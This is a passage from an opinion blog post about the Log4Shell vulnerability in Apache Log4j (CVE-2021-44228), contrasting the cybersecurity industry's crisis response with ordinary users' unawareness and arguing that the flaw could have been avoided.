Log4Shell is a dumpster fire that should have been avoided

On Thursday, December 9, 2021, my young, Minecraft-addicted kids were still completely oblivious of the Log4j vulnerabilities in their favorite game. Then again, so was every cybersecurity professional in the world.

Log4Shell should have been avoided

That all changed when the Apache Log4j project announced CVE-2021-44228 (aka Log4Shell) – a zero-day vulnerability in Log4j’s standardized method of handling log files used by apps all over the world, from Microsoft’s Minecraft to Twitter to Tesla to Apple’s iCloud. This led to a blaze of stories about how the internet is “on fire.”

These screaming headlines make sense for us in the software and digital services industry. This vulnerability, which continues to be followed by others, is bad news. And it’s hard to find a metaphor to describe an easily exploitable zero-days vulnerability in a huge number of high-value targets.

Rationally, nearly every business, organization, and government that does anything related to software went into crisis mode. It is difficult to imagine anyone having been unaffected, and most probably many are still on high alert even after nearly two weeks.

However, for most internet users, life went on as usual.

If they have read about the Log4Shell firestorm, average users have probably concluded this story was all smoke and no fire: Minecraft works, Facebook works, their iPhone is charged. Who cares? Amazon’s services in the US have been a bit on and off lately, but these were unrelated outages.

Fortunately, my kids, like most people, likely have no idea how bad this could get—at least not yet. But if you work in cybersecurity, you know one thing is true: most of us have lucked out, so far.

We could have avoided Log4Shell

The truth is we have no idea how severely attackers have taken advantage of the vulnerabilities in Log4j. Attackers can obfuscate their intrusions relatively easily and it’s unlikely that the hundreds of thousands of companies that have been busy patching their systems have engaged in any sort of incident response to detect whether the vulnerability was exploited before the update.

Without a doubt, this is a dumpster fire. And mostly everyone in our industry is doing their best to make sure…